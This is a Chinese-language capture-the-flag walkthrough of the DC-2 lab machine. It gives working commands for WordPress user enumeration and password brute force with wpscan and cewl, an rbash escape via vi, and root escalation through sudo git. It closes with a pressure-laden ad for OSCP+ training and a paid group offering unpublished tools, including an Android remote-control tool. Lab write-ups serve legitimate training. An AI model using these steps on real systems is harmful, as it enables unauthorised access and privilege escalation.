DC靶场系列--DC-2

目录

• 信息搜集
• 漏洞利用
• wpscan爆破密码
• 受限shell逃逸
• git提权
• 团购优惠
• 帮会

信息搜集

主机发现

端口扫描

wappalyzer:

目录扫描

发现登录框，还是wordpress框架

漏洞利用

wpscan爆破密码

爆破用户名

wpscan --urlhttp://dc-2/ -e u

将用户名存入usr.txt

爆破密码

根据网站上提示的flag1.我们需要使用cewl工具来生成字典

cewl http://dc-2/ -w dict.txt

然后爆破密码

 wpscan --url http://DC-2/ -U usr.txt -P dict.txt

找到两个用户。 Username: jerry, Password: adipiscing | Username: tom, Password: parturient

我们可以尝试ssh连接

jerry连不上，tom用户可以连上

受限shell逃逸

进入发现是受限的shell(rbash)，vi命令可以用。那我们可以利用vi进行rbash绕过

vi a
set shell=/bin/bash
shell
export PATH=$PATH:/bin/

这里有flag3.txt，提示说他需要切换到jerry用户，反正我们知道密码，切换一下

这个提示说要go on---git out，很明显是git提权

git提权

先sudo一下

这里可以进行无密码的git操作

那我们使用方法2看看

sudo git help config
GG(定位到文章末尾)
!/bin/sh

那这样我们就拿到了最后的flag

oscp+培训福利

团购优惠

官方的oscp+有团购优惠，10人组团可以打8折优惠，我们对标官方，也有组团优惠活动。

原价4000，学生认证可减500

现在两人组团每人减100，三人组队每人减200,四人组团每人减300,五人组团每人减400（也就是打9折），10人组团打8折

并且之后官方报名的时候，可以联系大陆官方负责人给学员进行10人团购，oscp目前价格是1649美元，并且马上就要涨价了。打8折优惠，目前可以便宜329.8美元，2400多块。要是在报上我们的10人团购。3200-2400=800，也就是只需要花费800不到的费用就能享受 7年红队经验，在职红队队长带领培训oscp+，并且是永久学习，可以无限学习下一期当然了也可以自己去凑团购，不过凑10个人还有有难度的，我们人多所以好凑很多

还有更多的限时福利，看下面

今年就这一次机会，过年趁着别人都在娱乐的时候，趁此机会弯道超车。让基友对你的飞速进步发出惊叹，让曾经的同事对你的专业素养投来羡慕的目光。

在你还在犹豫是否要报名OSCP的时候，别人已经行动了，在学习完oscp培训和泷羽sec的红队全栈课后，去考OSCP拿下竞争力，别人月入过几万了而你却还在为没有能力证明和没有工作而发愁，那为什么不行动起来呢?4000的价格比外面培训低了一半多，在加活动更低，也就这一次机会，后面都不会有了，就明年的这个时候才考虑举办。

帮会

可以加入一下我们的帮会，是真正的红队大佬创建的，里面会定时丢些网上没有的工具（比如安卓远控7.4，不过现在已经删除了，有时限，加入的记得看好时间），除了这个：还有大量的poc、渗透工具、渗透课程、实战案例等等。现在只要99就可以终身，后面人多了就会涨价了  私聊我获取邀请码